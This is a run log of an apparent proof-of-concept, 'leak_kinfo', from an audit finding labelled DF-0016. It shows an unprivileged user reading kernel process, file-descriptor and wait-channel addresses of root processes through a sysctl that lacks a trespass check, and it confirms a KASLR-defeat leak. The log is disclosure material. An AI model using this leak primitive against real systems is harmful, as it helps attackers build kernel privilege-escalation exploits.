DF-0016 / run.log
running as uid=1001 (./leak_kinfo); self pid=1843
reading kern.proc.pid.<pid> (KERN_PROC_PID -> PRISON_CHECK only, no p_trespass gate)
pid 1843 uid=1001 comm=leak_kinfo
kp_paddr = 0xfffff80066808280 (struct proc slab)
kp_fd = 0xfffff80066848940 (filedesc slab)
kl_wchan = 0x0000000000000000
kp_ktaddr = 0x0000000000000000
pid 1 uid=0 comm=init
kp_paddr = 0xfffff80066807880 (struct proc slab)
kp_fd = 0xfffff80066840ec0 (filedesc slab)
kl_wchan = 0xfffff80066807880 (wait channel)
kp_ktaddr = 0x0000000000000000
pid 68 uid=0 comm=hammer2
kp_paddr = 0xfffff800ab143280 (struct proc slab)
kp_fd = 0xfffff800ab163c40 (filedesc slab)
kl_wchan = 0xfffff80065c799f8 (wait channel)
kp_ktaddr = 0x0000000000000000
pid 285 uid=0 comm=dhclient
kp_paddr = 0xfffff8006680c880 (struct proc slab)
kp_fd = 0xfffff8006684c140 (filedesc slab)
kl_wchan = 0xfffff8006680c880 (wait channel)
kp_ktaddr = 0x0000000000000000
pid 328 uid=0 comm=devd
kp_paddr = 0xfffff800ab144180 (struct proc slab)
kp_fd = 0xfffff800ab1669c0 (filedesc slab)
kl_wchan = 0xfffff80067a5dff8 (wait channel)
kp_ktaddr = 0x0000000000000000
pid 411 uid=0 comm=syslogd
kp_paddr = 0xfffff800ab145080 (struct proc slab)
kp_fd = 0xfffff800ab167b40 (filedesc slab)
kl_wchan = 0xfffff80067a5e778 (wait channel)
kp_ktaddr = 0x0000000000000000
pid 699 uid=0 comm=sshd
kp_paddr = 0xfffff800ab144b80 (struct proc slab)
kp_fd = 0xfffff800ab1677c0 (filedesc slab)
kl_wchan = 0xfffff80067a5e4f8 (wait channel)
kp_ktaddr = 0x0000000000000000
pid 730 uid=0 comm=cron
kp_paddr = 0xfffff800ab144680 (struct proc slab)
kp_fd = 0xfffff800ab16a540 (filedesc slab)
kl_wchan = 0xffffffff8130f670 (wait channel)
kp_ktaddr = 0x0000000000000000
=== stability check: read pid 1 three times, kp_paddr must match ===
pid 1 kp_paddr: 0xfffff80066807880 / 0xfffff80066807880 / 0xfffff80066807880 (STABLE = real struct proc address)
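result: 24 kernel pointers leaked across 8 processes [note: the 24 matches 8 processes x 3 fields (kp_paddr, kp_fd, kl_wchan); 23 of those values in the listing above are non-zero, since pid 1843's kl_wchan is 0, and kp_ktaddr is 0 for every process]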
result: LEAK CONFIRMED (KASLR-defeat / slab-address primitive)
RUN_EXIT=0